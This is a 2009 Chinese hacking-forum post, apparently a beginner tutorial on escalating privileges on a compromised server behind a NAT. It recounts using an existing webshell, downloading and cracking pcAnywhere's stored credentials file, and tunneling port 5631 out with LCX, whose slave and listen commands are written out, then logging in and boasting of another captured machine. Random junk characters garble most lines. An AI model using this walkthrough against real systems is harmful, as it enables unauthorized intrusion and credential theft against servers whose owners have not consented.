|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
3 i3 a, d# p- X% x' F/ S2 S: `& ~( H6 A) j( f2 S# s* D7 V8 Y$ r% x0 X
提权方法:pcanywhere+LCX
% A6 P: c8 P4 b0 V- D3 C T; ]4 G% J5 U7 v, \4 w( |% T6 i
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
$ N6 p2 ^- z- `2 K# i5 {
2 x, j' Q8 y F# i在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
. s' O0 Z5 e* [
' G1 x x+ @/ s$ D
4 J4 h$ i" r7 w% Y; X查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。7 R. g- r5 b+ _; h: ^
( C$ I. P7 _' D
! Q% f4 _, e' B$ R+ S$ r呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。$ S4 v5 j) L$ Q
+ v% {3 o2 q- s1 ?0 T
; R- V4 U9 q- s" D1 |. h; M! `: v% X9 _4 [2 @/ J- w+ C
: s. g$ m4 a# t& a% m由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
' X; R* p3 I6 f" v; B. o
) Q. o- |, z; z, s0 Q/ h
. h5 z; x3 e. Y9 L. v' ?2 d aLCX的用法再简单说下:2 a0 H9 H9 U; Q
( q: p! h. v2 h$ V! g8 S1 Z服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)8 j* g) [3 H' H @, u" y
3 S* k* a8 a' a, }6 P本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
$ _. N/ o: P* u" |) p4 b% d2 J/ y0 Y+ j
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
' _( l+ T" u1 b( m$ ^( V顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
0 q& u' H/ j, u& V) u5 S( h4 W
1 c! V4 [) G$ t* a8 M4 V1 |0 m6 T I2 }/ k. g, f- I
% h8 R- s3 s* l. g2 g
5 q3 M E/ N& X* J( {* C4 Z
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。" ~3 a$ J! y2 i
, B, _. @- r+ T
) V- z$ ^8 \8 |! Q' h, C! U' Z, p7 m$ I* c- P
* v x& { a" t( v* g' V3 ^1 _
我们本地连接试试,输入我们刚破解的账号密码; \, l6 w$ V$ p! a7 F+ ^
' r1 }; n' e- Z' @8 f) |
( Z2 _* [ |4 s, G7 l5 m2 ]0 S
呵呵``连接成功,服务器不错,又一个8核^︵^
) j: E J% M# U4 c6 }$ @6 B
$ e Q- u+ |0 D# O5 F/ M1 n. e- `! {( I, v4 ?
, B$ c0 m" Q# \9 h |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-12-15 15:36
| 
.gif)
